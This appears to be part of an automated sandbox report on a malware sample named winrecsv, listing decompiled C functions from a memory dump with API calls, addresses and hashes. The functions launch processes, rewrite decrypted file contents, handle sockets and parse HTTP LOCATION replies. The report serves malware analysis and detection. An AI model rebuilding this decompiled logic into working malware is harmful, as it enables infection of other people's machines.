                                                                                  			}







                                                                                  0x0040d74e
                                                                                  0x0040d758
                                                                                  0x0040d75b
                                                                                  0x0040d75e
                                                                                  0x0040d761
                                                                                  0x0040d764
                                                                                  0x0040d76b
                                                                                  0x0040d777
                                                                                  0x0040d78f
                                                                                  0x0040d79e
                                                                                  0x0040d7b5
                                                                                  0x0040d7c6
                                                                                  0x0040d7cc
                                                                                  0x0040d7d3
                                                                                  0x00000000
                                                                                  0x0040d7e4
                                                                                  0x0040d7da
                                                                                  0x00000000
                                                                                  0x0040d7e0
                                                                                  0x0040d7a5
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • memset.NTDLL ref: 0040D74E
                                                                                  • CreateProcessW.KERNEL32 ref: 0040D795
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7A5
                                                                                  • ShellExecuteW.SHELL32(00000000,open,ne@,00000000,00000000,00000000), ref: 0040D7C0
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D7DA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleep$CreateExecuteProcessShellmemset
                                                                                  • String ID: $D$ne@$open
                                                                                  • API String ID: 2222793131-3207568236
                                                                                  • Opcode ID: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction ID: 933796f3933de1520c7fb78abd268757ff0d70a2e837ae2d9ddd379650c1acbf
                                                                                  • Opcode Fuzzy Hash: 5f6903af65bfe535200d81666b806fcc276bdec7bf2871f08574f27a7109b4d3
                                                                                  • Instruction Fuzzy Hash: 05110071E84308BBEB14DFD4DD46BDE7774AB18700F20412AF609BB2C0D7B55A448B59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 83%
                                                                                  			E0040D580(WCHAR* _a4) {
                                                                                  				void* _v8;
                                                                                  				long _v12;
                                                                                  				void* _v16;
                                                                                  				DWORD* _v20;
                                                                                  				char _v21;
                                                                                  				void* _v28;
                                                                                  				void* _v32;
                                                                                  				char _v48;
                                                                                  				DWORD* _t70;
                                                                                  				void* _t73;
                                                                                  				void* _t103;
                                                                                  
                                                                                  				_v21 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v20 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v16 = CreateFileW(_a4, 0x80000000, 0, 0, 3, 0, 0);
                                                                                  				if(_v16 == 0xffffffff) {
                                                                                  					L12:
                                                                                  					if(_v8 != 0) {
                                                                                  						_v16 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0, 0);
                                                                                  						if(_v16 != 0xffffffff) {
                                                                                  							_v21 = 1;
                                                                                  							WriteFile(_v16, _v8, _v12,  &_v12, 0);
                                                                                  							CloseHandle(_v16);
                                                                                  						}
                                                                                  						E00408FB0(_v8);
                                                                                  					}
                                                                                  					return _v21;
                                                                                  				}
                                                                                  				_v28 = CreateFileMappingW(_v16, 0, 2, 0, 0, 0);
                                                                                  				if(_v28 == 0) {
                                                                                  					L11:
                                                                                  					CloseHandle(_v16);
                                                                                  					goto L12;
                                                                                  				}
                                                                                  				_v32 = MapViewOfFile(_v28, 4, 0, 0, 0);
                                                                                  				if(_v32 == 0) {
                                                                                  					L10:
                                                                                  					CloseHandle(_v28);
                                                                                  					goto L11;
                                                                                  				} else {
                                                                                  					_v12 = GetFileSize(_v16, 0);
                                                                                  					if(_v12 > 0x100) {
                                                                                  						_t70 = E0040B4C0(_v32, _v32);
                                                                                  						_t103 = _t103 + 4;
                                                                                  						_v20 = _t70;
                                                                                  						if(_v20 != 0 && _v20[6] == _v12 - 0x100) {
                                                                                  							_v12 = _v20[6];
                                                                                  							_t73 = E0040AE60(_v32 + 0x100,  &(_v20[2]), 0x10, _v32 + 0x100, _v12);
                                                                                  							_t103 = _t103 + 0x10;
                                                                                  							_v8 = _t73;
                                                                                  							if(_v8 != 0) {
                                                                                  								E00409800(_v8, _v12,  &_v48);
                                                                                  								_t103 = _t103 + 0xc;
                                                                                  								asm("repe cmpsd");
                                                                                  								if(0 != 0) {
                                                                                  									E00408FB0(_v8);
                                                                                  									_t103 = _t103 + 4;
                                                                                  									_v8 = 0;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  					UnmapViewOfFile(_v32);
                                                                                  					goto L10;
                                                                                  				}
                                                                                  			}














                                                                                  0x0040d588
                                                                                  0x0040d58c
                                                                                  0x0040d593
                                                                                  0x0040d59a
                                                                                  0x0040d5ba
                                                                                  0x0040d5c1
                                                                                  0x0040d6d3
                                                                                  0x0040d6d7
                                                                                  0x0040d6f2
                                                                                  0x0040d6f9
                                                                                  0x0040d6fb
                                                                                  0x0040d711
                                                                                  0x0040d71b
                                                                                  0x0040d71b
                                                                                  0x0040d725
                                                                                  0x0040d72a
                                                                                  0x0040d735
                                                                                  0x0040d735
                                                                                  0x0040d5db
                                                                                  0x0040d5e2
                                                                                  0x0040d6c9
                                                                                  0x0040d6cd
                                                                                  0x00000000
                                                                                  0x0040d6cd
                                                                                  0x0040d5fa
                                                                                  0x0040d601
                                                                                  0x0040d6bf
                                                                                  0x0040d6c3
                                                                                  0x00000000
                                                                                  0x0040d607
                                                                                  0x0040d613
                                                                                  0x0040d61d
                                                                                  0x0040d627
                                                                                  0x0040d62c
                                                                                  0x0040d62f
                                                                                  0x0040d636
                                                                                  0x0040d64f
                                                                                  0x0040d669
                                                                                  0x0040d66e
                                                                                  0x0040d671
                                                                                  0x0040d678
                                                                                  0x0040d686
                                                                                  0x0040d68b
                                                                                  0x0040d69e
                                                                                  0x0040d6a0
                                                                                  0x0040d6a6
                                                                                  0x0040d6ab
                                                                                  0x0040d6ae
                                                                                  0x0040d6ae
                                                                                  0x0040d6a0
                                                                                  0x0040d678
                                                                                  0x0040d636
                                                                                  0x0040d6b9
                                                                                  0x00000000
                                                                                  0x0040d6b9

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040D5B4
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040D5D5
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040D5F4
                                                                                  • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040D60D
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040D6B9
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040D6C3
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D6CD
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D6EC
                                                                                  • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040D711
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D71B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWrite
                                                                                  • String ID:
                                                                                  • API String ID: 171974401-0
                                                                                  • Opcode ID: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction ID: abd0401628c18b29deb1849a45b8fcca8b7b44c39020343394329d6e44a62b50
                                                                                  • Opcode Fuzzy Hash: 0f9f188c6dc80e39ad04ba57d57415bc9a5561ea4dd1a5a43cd4d3438c38bcb4
                                                                                  • Instruction Fuzzy Hash: 06514DB5E00208FBDB14DFE4CC49BEEB775AB48704F108569E615772C0D7B96A84CB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040EBE0(void* __eax, long __ebx, void* __ecx, short _a4, short _a6) {
                                                                                  				long _v4;
                                                                                  				intOrPtr _v8;
                                                                                  				intOrPtr _v12;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				char _v28;
                                                                                  				void* __esi;
                                                                                  				intOrPtr _t59;
                                                                                  				intOrPtr _t64;
                                                                                  				void* _t73;
                                                                                  				void* _t106;
                                                                                  				void* _t108;
                                                                                  
                                                                                  				_t108 = __eax;
                                                                                  				_t106 = __ecx;
                                                                                  				if(_a4 != 0 || __ebx == 0) {
                                                                                  					InterlockedDecrement(_t108 + 0x14);
                                                                                  					_a4 = 1;
                                                                                  					_t59 =  *((intOrPtr*)(_t106 + 0x260));
                                                                                  					 *((char*)(_t106 + 0x275)) = 1;
                                                                                  					_a6 = 0;
                                                                                  					__imp__#21(_t59, 0xffff, 0x80,  &_a4, 4);
                                                                                  					__imp__#3( *((intOrPtr*)(_t106 + 0x260)));
                                                                                  					 *((intOrPtr*)(_t106 + 0x260)) = 0xffffffff;
                                                                                  					return _t59;
                                                                                  				}
                                                                                  				InterlockedExchange(_t106 + 4, E0040C210());
                                                                                  				_t64 =  *((intOrPtr*)(_t108 + 0x18));
                                                                                  				if(_t64 == 0) {
                                                                                  					if( *((char*)(_t106 + 0x275)) == 0) {
                                                                                  						 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) + __ebx;
                                                                                  						if( *((intOrPtr*)(_t108 + 0x28)) >=  *((intOrPtr*)(_t108 + 0x24))) {
                                                                                  							InterlockedDecrement(_t108 + 0x14);
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v8 =  *((intOrPtr*)(_t108 + 0x30));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v4 =  *((intOrPtr*)(_t108 + 0x28));
                                                                                  							return E0040E5C0(2, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t108 + 0x20)) + __ebx;
                                                                                  							 *((intOrPtr*)(_t108 + 0x1c)) =  *((intOrPtr*)(_t108 + 0x1c)) - __ebx;
                                                                                  							_push(_t106);
                                                                                  							return E0040E960(_t108);
                                                                                  						}
                                                                                  					} else {
                                                                                  						return InterlockedDecrement(_t108 + 0x14);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t73 = _t64 - 1;
                                                                                  					if(_t73 != 0) {
                                                                                  						L14:
                                                                                  						return _t73;
                                                                                  					} else {
                                                                                  						if( *((intOrPtr*)(_t106 + 0x275)) == _t73) {
                                                                                  							InterlockedDecrement(_t106 + 0x21c);
                                                                                  							InterlockedExchangeAdd( *((intOrPtr*)(_t106 + 0x27c)) + 0x44, __ebx);
                                                                                  							_v28 =  *((intOrPtr*)(_t106 + 0x264));
                                                                                  							_v24 =  *((intOrPtr*)(_t106 + 0x268));
                                                                                  							_v16 =  *((intOrPtr*)(_t106 + 0x270));
                                                                                  							_v20 =  *((intOrPtr*)(_t106 + 0x26c));
                                                                                  							_v12 =  *((intOrPtr*)(_t106 + 0x278));
                                                                                  							_v8 = _t106 + 8;
                                                                                  							_v4 = __ebx;
                                                                                  							E0040E5C0(3, _t106,  *((intOrPtr*)(_t106 + 0x27c)),  &_v28);
                                                                                  							_t73 = E0040EB70(_t106);
                                                                                  							if(_t73 != 0) {
                                                                                  								goto L14;
                                                                                  							} else {
                                                                                  								 *((char*)(_t106 + 0x275)) = 1;
                                                                                  								return _t73;
                                                                                  							}
                                                                                  						} else {
                                                                                  							return InterlockedDecrement(_t106 + 0x21c);
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}
















                                                                                  0x0040ebea
                                                                                  0x0040ebec
                                                                                  0x0040ebee
                                                                                  0x0040ed76
                                                                                  0x0040ed8d
                                                                                  0x0040ed92
                                                                                  0x0040eda0
                                                                                  0x0040eda7
                                                                                  0x0040edac
                                                                                  0x0040edb9
                                                                                  0x0040edbf
                                                                                  0x00000000
                                                                                  0x0040edbf
                                                                                  0x0040ec06
                                                                                  0x0040ec0f
                                                                                  0x0040ec12
                                                                                  0x0040ecd5
                                                                                  0x0040ece7
                                                                                  0x0040ecf0
                                                                                  0x0040ed0b
                                                                                  0x0040ed23
                                                                                  0x0040ed2d
                                                                                  0x0040ed34
                                                                                  0x0040ed38
                                                                                  0x0040ed42
                                                                                  0x0040ed51
                                                                                  0x0040ed60
                                                                                  0x0040ed71
                                                                                  0x0040ecf2
                                                                                  0x0040ecf2
                                                                                  0x0040ecf5
                                                                                  0x0040ecf8
                                                                                  0x0040ed06
                                                                                  0x0040ed06
                                                                                  0x0040ecd7
                                                                                  0x0040ece6
                                                                                  0x0040ece6
                                                                                  0x0040ec18
                                                                                  0x0040ec18
                                                                                  0x0040ec1b
                                                                                  0x0040edce
                                                                                  0x0040edce
                                                                                  0x0040ec21
                                                                                  0x0040ec27
                                                                                  0x0040ec43
                                                                                  0x0040ec54
                                                                                  0x0040ec6c
                                                                                  0x0040ec76
                                                                                  0x0040ec80
                                                                                  0x0040ec84
                                                                                  0x0040ec88
                                                                                  0x0040ec9a
                                                                                  0x0040eca6
                                                                                  0x0040ecaa
                                                                                  0x0040ecb4
                                                                                  0x0040ecbb
                                                                                  0x00000000
                                                                                  0x0040ecc1
                                                                                  0x0040ecc1
                                                                                  0x0040eccd
                                                                                  0x0040eccd
                                                                                  0x0040ec29
                                                                                  0x0040ec3b
                                                                                  0x0040ec3b
                                                                                  0x0040ec27
                                                                                  0x0040ec1b

                                                                                  APIs
                                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 0040EC06
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC30
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040EC43
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,?), ref: 0040EC54
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ECDB
                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0040ED76
                                                                                  • setsockopt.WS2_32 ref: 0040EDAC
                                                                                  • closesocket.WS2_32(?), ref: 0040EDB9
                                                                                    • Part of subcall function 0040C210: NtQuerySystemTime.NTDLL ref: 0040C21A
                                                                                    • Part of subcall function 0040C210: RtlTimeToSecondsSince1980.NTDLL ref: 0040C228
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 671207744-0
                                                                                  • Opcode ID: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction ID: a63a62e2eddc4c6ea33aec9a9dae6784646f40805859537cb5bfc137b0e9617d
                                                                                  • Opcode Fuzzy Hash: eac7544d65530684678831c593fe10f9f5ab3dca7285b72a3d6bbcbf7238f9b5
                                                                                  • Instruction Fuzzy Hash: CC51B175608702AFC704DF29D488B96FBE0BF88314F008A2EE49D83351D735A554CB95
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00409D70(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                                  				signed char _v5;
                                                                                  				signed int _v12;
                                                                                  				signed int _v13;
                                                                                  				signed int _v20;
                                                                                  				signed char _t47;
                                                                                  				char* _t49;
                                                                                  				char* _t52;
                                                                                  				signed int _t56;
                                                                                  				void* _t60;
                                                                                  				char* _t63;
                                                                                  				signed int _t68;
                                                                                  				char* _t69;
                                                                                  				signed int _t71;
                                                                                  				signed int _t79;
                                                                                  				signed int _t81;
                                                                                  				intOrPtr _t83;
                                                                                  				char* _t85;
                                                                                  				void* _t87;
                                                                                  				void* _t88;
                                                                                  				void* _t90;
                                                                                  				void* _t94;
                                                                                  
                                                                                  				_t47 = E00409AB0(_a4);
                                                                                  				_t88 = _t87 + 4;
                                                                                  				_t65 = _t47 & 0x000000ff;
                                                                                  				if((_t47 & 0x000000ff) == 0) {
                                                                                  					_t49 = strstr(E00409820(_t65, _a4), "127.");
                                                                                  					_t90 = _t88 + 0xc;
                                                                                  					__eflags = _t49;
                                                                                  					if(_t49 == 0) {
                                                                                  						L6:
                                                                                  						EnterCriticalSection(0x414e4c);
                                                                                  						_v5 = 0;
                                                                                  						_v12 = 0;
                                                                                  						while(1) {
                                                                                  							__eflags = _v12 -  *0x414e84; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t83 =  *((intOrPtr*)(0x414e88 + _v12 * 4));
                                                                                  							__eflags =  *((intOrPtr*)(_t83 + 4)) - _a4;
                                                                                  							if( *((intOrPtr*)(_t83 + 4)) != _a4) {
                                                                                  								_t85 = _v12 + 1;
                                                                                  								__eflags = _t85;
                                                                                  								_v12 = _t85;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t60 = E0040C210();
                                                                                  							_t50 = _t60 - _a8;
                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(0x414e88 + _v12 * 4)) + 8)) = _t60 - _a8;
                                                                                  							_v5 = 1;
                                                                                  							break;
                                                                                  						}
                                                                                  						E00409CC0(_t50);
                                                                                  						_t52 = _v5 & 0x000000ff;
                                                                                  						__eflags = _t52;
                                                                                  						if(_t52 != 0) {
                                                                                  							L23:
                                                                                  							LeaveCriticalSection(0x414e4c);
                                                                                  							return _t52;
                                                                                  						}
                                                                                  						_v13 = 0;
                                                                                  						__eflags =  *0x414e84 - 0x200;
                                                                                  						if( *0x414e84 == 0x200) {
                                                                                  							_v13 = 1;
                                                                                  						}
                                                                                  						_t52 = E00408E40(0xc);
                                                                                  						_v20 = _t52;
                                                                                  						__eflags = _v20;
                                                                                  						if(_v20 == 0) {
                                                                                  							goto L23;
                                                                                  						} else {
                                                                                  							 *((intOrPtr*)(_v20 + 4)) = _a4;
                                                                                  							 *((intOrPtr*)(_v20 + 8)) = E0040C210() - _a8;
                                                                                  							__eflags = _v13 & 0x000000ff;
                                                                                  							if((_v13 & 0x000000ff) == 0) {
                                                                                  								_t79 =  *0x414e84; // 0x0
                                                                                  								_t55 = _v20;
                                                                                  								 *((intOrPtr*)(0x414e88 + _t79 * 4)) = _v20;
                                                                                  								_t68 =  *0x414e84; // 0x0
                                                                                  								_t69 = _t68 + 1;
                                                                                  								__eflags = _t69;
                                                                                  								 *0x414e84 = _t69;
                                                                                  								L21:
                                                                                  								_t52 = E00409CC0(_t55);
                                                                                  								__eflags = _a12 & 0x000000ff;
                                                                                  								if((_a12 & 0x000000ff) != 0) {
                                                                                  									_t52 = E004099A0(_t52);
                                                                                  								}
                                                                                  								goto L23;
                                                                                  							} else {
                                                                                  								goto L17;
                                                                                  							}
                                                                                  							while(1) {
                                                                                  								L17:
                                                                                  								_t56 =  *0x414e84; // 0x0
                                                                                  								__eflags =  *(0x414e84[_t56]);
                                                                                  								if( *(0x414e84[_t56]) == 0) {
                                                                                  									break;
                                                                                  								}
                                                                                  								Sleep(1);
                                                                                  							}
                                                                                  							_t81 =  *0x414e84; // 0x0
                                                                                  							 *(0x414e84[_t81]) = 1;
                                                                                  							_t71 =  *0x414e84; // 0x0
                                                                                  							E00408FB0(0x414e84[_t71]);
                                                                                  							_t55 =  *0x414e84; // 0x0
                                                                                  							0x414e84[_t55] = _v20;
                                                                                  							goto L21;
                                                                                  						}
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_t65, _a4), ".127");
                                                                                  					_t94 = _t90 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 == 0) {
                                                                                  						L5:
                                                                                  						return _t63;
                                                                                  					}
                                                                                  					_t63 = strstr(E00409820(_a4, _a4), ".127.");
                                                                                  					_t90 = _t94 + 0xc;
                                                                                  					__eflags = _t63;
                                                                                  					if(_t63 != 0) {
                                                                                  						goto L6;
                                                                                  					}
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				return _t47;
                                                                                  			}
























                                                                                  0x00409d7a
                                                                                  0x00409d7f
                                                                                  0x00409d82
                                                                                  0x00409d87
                                                                                  0x00409da0
                                                                                  0x00409da5
                                                                                  0x00409da8
                                                                                  0x00409daa
                                                                                  0x00409ded
                                                                                  0x00409df2
                                                                                  0x00409df8
                                                                                  0x00409dfc
                                                                                  0x00409e0e
                                                                                  0x00409e11
                                                                                  0x00409e17
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409e1c
                                                                                  0x00409e26
                                                                                  0x00409e29
                                                                                  0x00409e08
                                                                                  0x00409e08
                                                                                  0x00409e0b
                                                                                  0x00000000
                                                                                  0x00409e0b
                                                                                  0x00409e2b
                                                                                  0x00409e30
                                                                                  0x00409e3d
                                                                                  0x00409e40
                                                                                  0x00000000
                                                                                  0x00409e40
                                                                                  0x00409e48
                                                                                  0x00409e4d
                                                                                  0x00409e51
                                                                                  0x00409e53
                                                                                  0x00409f29
                                                                                  0x00409f2e
                                                                                  0x00000000
                                                                                  0x00409f2e
                                                                                  0x00409e59
                                                                                  0x00409e5d
                                                                                  0x00409e67
                                                                                  0x00409e69
                                                                                  0x00409e69
                                                                                  0x00409e6f
                                                                                  0x00409e77
                                                                                  0x00409e7a
                                                                                  0x00409e7e
                                                                                  0x00000000
                                                                                  0x00409e84
                                                                                  0x00409e8a
                                                                                  0x00409e98
                                                                                  0x00409e9f
                                                                                  0x00409ea1
                                                                                  0x00409ef8
                                                                                  0x00409efe
                                                                                  0x00409f01
                                                                                  0x00409f08
                                                                                  0x00409f0e
                                                                                  0x00409f0e
                                                                                  0x00409f11
                                                                                  0x00409f17
                                                                                  0x00409f17
                                                                                  0x00409f20
                                                                                  0x00409f22
                                                                                  0x00409f24
                                                                                  0x00409f24
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409ea3
                                                                                  0x00409eaf
                                                                                  0x00409eb2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409eb6
                                                                                  0x00409eb6
                                                                                  0x00409ebe
                                                                                  0x00409ecb
                                                                                  0x00409ed1
                                                                                  0x00409edf
                                                                                  0x00409ee7
                                                                                  0x00409eef
                                                                                  0x00000000
                                                                                  0x00409eef
                                                                                  0x00409e7e
                                                                                  0x00409dbe
                                                                                  0x00409dc3
                                                                                  0x00409dc6
                                                                                  0x00409dc8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409ddc
                                                                                  0x00409de1
                                                                                  0x00409de4
                                                                                  0x00409de6
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00409de6
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 00409AB0: gethostname.WS2_32(?,00000100), ref: 00409ACC
                                                                                    • Part of subcall function 00409AB0: gethostbyname.WS2_32(?), ref: 00409ADE
                                                                                  • strstr.NTDLL ref: 00409DA0
                                                                                  • strstr.NTDLL ref: 00409DBE
                                                                                  • strstr.NTDLL ref: 00409DDC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: strstr$gethostbynamegethostname
                                                                                  • String ID: .127$.127.$127.
                                                                                  • API String ID: 2540993189-1573993753
                                                                                  • Opcode ID: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction ID: 183aa7514d5840da55b51ccb33f3d2103a3eb28b4696c2bac9d1f078e1a22ee6
                                                                                  • Opcode Fuzzy Hash: 8884d166f746be7126d4f476aea7d7a78fa78d4b36ab4e2f45a01bafcb5ad5fb
                                                                                  • Instruction Fuzzy Hash: F45190B4944306DBCB04EF64E8417AA7BB5BB84304F14803EE805A73D2E779ED80CB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040C840(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                  				char _v1028;
                                                                                  				char _v1029;
                                                                                  				intOrPtr _v1036;
                                                                                  				char* _v1040;
                                                                                  				char* _v1044;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t29;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				_t20 = __eax;
                                                                                  				_v1029 = 0;
                                                                                  				_v1036 = 0;
                                                                                  				while(_v1036 < 2) {
                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0);
                                                                                  					if(_t20 != 0xffffffff) {
                                                                                  						_v1029 = 1;
                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                  							if(_v1040 != 0) {
                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                  								_t29 = E0040B640(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                  								_t37 = _t37 + 8;
                                                                                  								 *_a8 = _t29;
                                                                                  							}
                                                                                  						}
                                                                                  					} else {
                                                                                  						Sleep(0x3e8);
                                                                                  					}
                                                                                  					_t20 = _v1036 + 1;
                                                                                  					_v1036 = _t20;
                                                                                  				}
                                                                                  				return _v1029;
                                                                                  			}











                                                                                  0x0040c840
                                                                                  0x0040c849
                                                                                  0x0040c850
                                                                                  0x0040c86b
                                                                                  0x0040c88e
                                                                                  0x0040c897
                                                                                  0x0040c8a6
                                                                                  0x0040c8c3
                                                                                  0x0040c8d7
                                                                                  0x0040c8e4
                                                                                  0x0040c8ef
                                                                                  0x0040c912
                                                                                  0x0040c917
                                                                                  0x0040c91d
                                                                                  0x0040c91d
                                                                                  0x0040c8e4
                                                                                  0x0040c899
                                                                                  0x0040c89e
                                                                                  0x0040c89e
                                                                                  0x0040c862
                                                                                  0x0040c865
                                                                                  0x0040c865
                                                                                  0x0040c92d

                                                                                  APIs
                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C88E
                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040C89E
                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C8BB
                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C8D1
                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C8FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.347586028.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.347579828.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.347603916.0000000000413000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Sleeprecvfrom
                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                  • API String ID: 668330359-3973262388
